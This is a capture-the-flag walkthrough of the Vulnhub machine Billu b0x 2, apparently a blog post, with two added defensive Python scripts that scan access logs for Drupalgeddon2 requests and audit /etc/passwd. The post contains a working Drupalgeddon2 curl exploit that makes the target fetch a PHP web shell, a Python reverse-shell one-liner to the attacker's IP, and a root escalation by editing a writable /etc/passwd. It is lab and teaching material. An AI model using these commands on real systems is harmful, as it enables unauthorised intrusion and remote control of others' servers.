
Billu b0x 2 Walkthrough - Vulnhub Machine

Hello Friends,

This is my first boot2root writeup, on a vulnerable machine made by my brother, Manish Kishan Tanwar.
The machine is based on the latest vulnerability in the Drupal CMS.

Let's get started ...

Since port 80 was open, I started by testing the web application. Looking at the page source made it clear that the site was running a CMS called Drupal. I verified the Drupal version from changelog.txt.

The Drupal version in use was 8.x. That rang a bell, and I decided to give the famous Drupalgeddon2 exploit a try. I attempted the exploitation through curl.

I used the following command to download a PHP web shell onto the target:
curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5
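From the defender's side, the request shape above is what a web server log actually records: a POST to /user/register with element_parents pointing at a #value and ajax_form=1 (the render-array key travels in the POST body, which access logs do not keep). The scanner below is an added example, not part of the original post; the access-log lines and IP addresses are constructed.

```python
"""Flag Drupalgeddon2-style Form API requests in a combined-format access log.

Added example (not from the original walkthrough). SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx combined log format.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2018:12:00:01 +0000] "GET /node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Apr/2018:12:00:07 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1 HTTP/1.1" 200 213 "-" "curl/7.58.0"
10.0.0.5 - - [10/Apr/2018:12:00:09 +0000] "GET /user/register HTTP/1.1" 200 8712 "-" "Mozilla/5.0"
"""

# One combined-format line: client, identity, user, [timestamp], "request", status, size, "referer", "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def is_drupalgeddon2_request(method: str, path: str) -> bool:
    """True for a POST to /user/register whose query string has element_parents
    ending in a #value key together with ajax_form=1, i.e. the URL half of the
    request shown in the post. The path is URL-decoded first so %23 and # match alike."""
    if method != "POST":
        return False
    url = unquote(path)
    if not url.startswith("/user/register"):
        return False
    return "element_parents=" in url and "#value" in url and "ajax_form=1" in url


def scan_access_log(text: str) -> list:
    """Return (client_ip, timestamp, request_path) for each matching line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_drupalgeddon2_request(m["method"], m["path"]):
            hits.append((m["ip"], m["ts"], m["path"]))
    return hits


if __name__ == "__main__":
    for ip, ts, path in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {path}")
```

A single hit against a Drupal 8 host should be treated as an attempted exploitation and followed up by checking the web root for newly written files, as the post's next step (a dropped web shell) illustrates.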


Through the PHP shell, I got a reverse shell back to my netcat listener using a Python reverse shell one-liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'



The reverse shell I got was not interactive, so I needed to spawn a TTY with the following command:
python -c 'import pty;pty.spawn("/bin/sh")'


I tried multiple things, including running some kernel exploits. I found that /etc/passwd had wide-open permissions and I was able to edit the file. I also saw that one account in /etc/passwd had a password hash stored directly in its entry. I had seen a similar thing during my OSCP lab, and therefore tried adding my own password hash into the root user's entry in passwd.


If a password hash is present in the second field of an /etc/passwd entry, it takes precedence over the one in /etc/shadow, and thus I was able to log in as root.
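Both conditions the post relied on (a passwd file writable by non-root users, and a hash sitting in the password field instead of the usual "x" shadow marker) are simple to audit. The script below is an added example, not part of the original post; SAMPLE_PASSWD is constructed and its hash is a placeholder, and audit_passwd_file() is the same check pointed at a real path.

```python
"""Audit /etc/passwd for a non-owner-writable file and for entries that carry
their own password hash (which the login stack uses instead of /etc/shadow).

Added example (not from the original walkthrough). SAMPLE_PASSWD is constructed;
the $6$ value is a placeholder, not a real credential.
"""
import os
import stat
from typing import Dict, List, Tuple

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
svcacct:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:1001:1001::/home/svcacct:/bin/sh
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
"""

# Field-2 values that mean "look in /etc/shadow" or "account locked".
# Anything else is either a real hash or an empty (passwordless) field; both are findings.
SHADOW_MARKERS = {"x", "*", "!", "!!"}


def find_local_hashes(passwd_text: str) -> List[Tuple[str, int]]:
    """Return (username, uid) for every well-formed entry whose password field
    is not a shadow/lock marker. Malformed lines (not 7 fields) are skipped."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if not line or line.startswith("#") or len(fields) != 7:
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if pw not in SHADOW_MARKERS:
            findings.append((user, int(uid)))
    return findings


def mode_is_unsafe(mode: int) -> bool:
    """/etc/passwd is expected to be 0644 root-owned; any group or other write bit
    lets a non-root user rewrite entries, as in the post."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path: str = "/etc/passwd") -> Dict[str, object]:
    """Run both checks against a real file on disk."""
    st = os.stat(path)
    with open(path) as fh:
        text = fh.read()
    return {"writable_by_non_owner": mode_is_unsafe(st.st_mode),
            "owner_uid": st.st_uid,
            "local_hashes": find_local_hashes(text)}


if __name__ == "__main__":
    print(find_local_hashes(SAMPLE_PASSWD))                   # [('svcacct', 1001)]
    print(mode_is_unsafe(0o100666), mode_is_unsafe(0o100644))  # True False
```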




Thanks for reading. Happy Hacking ;)
